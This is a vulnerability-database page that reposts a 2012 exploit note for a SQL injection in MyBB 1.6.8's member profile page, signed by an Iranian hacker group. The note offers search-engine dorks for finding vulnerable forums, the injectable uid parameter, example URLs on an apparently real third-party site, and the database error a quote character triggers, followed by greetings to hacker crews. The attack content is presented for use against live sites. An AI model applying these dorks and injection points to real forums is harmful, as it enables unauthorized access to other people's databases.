MyBB 1.6.8 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047345 漏洞类型
发布时间 2012-06-06 更新时间 2012-06-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060058
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-------------------- IN The NAme OF God --------------------


-====MyBB 1.6.8 Sql Injection Vulnerability====-

# Exploit Title: MyBB 1.6.8 Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://mybb.com
# MAil : No0PM[at]yahoo[dot]com

-====Dork====-

inurl:member.php?action=profile&uid=

inurl:action=profile&uid=27

-====Exploit====-

http://www.Site.com/forums/member.php?action=profile&uid=[Sqli]

-====Example====-

http://www.mihxxnhack.com/forums/member.php?action=profile&uid=9

http://www.mihxxhack.com/forums/member.php?action=profile&uid=9'


-====information====-

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
    SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' 

-====Tnx To====-

Just Persian Gulf ~~~~ > W3 Are Persian Hackerz

MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.org